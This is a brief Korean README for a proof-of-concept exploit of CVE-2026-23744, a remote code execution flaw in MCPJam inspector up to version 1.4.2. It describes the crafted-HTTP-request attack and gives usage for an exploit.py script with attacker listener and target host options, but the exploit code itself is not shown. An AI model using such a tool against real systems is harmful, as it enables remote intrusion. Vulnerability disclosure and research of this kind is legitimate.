
CVE-2026-23744 개념 증명.
MCPJam inspector는 MCP 서버를 위한 로컬 우선(local-first) 개발 플랫폼입니다. <=1.4.2 버전은 원격 코드 실행 취약점에 영향을 받으며, 공격자가 조작된 HTTP 요청을 보내 MCP 서버 설치를 유발하여 RCE를 발생시킬 수 있습니다. 취약점에 대한 자세한 내용은 참조를 확인하세요.
$ pip install requests
$ python3 exploit.py [-h] [--lhost LHOST] [--lport LPORT] [--rhost RHOST] [--rport RPORT]
-h, --help show the help message and exit
--lhost LHOST local host IP
--lport LPORT local host port
--rhost RHOST remote IP
--rport RPORT remote port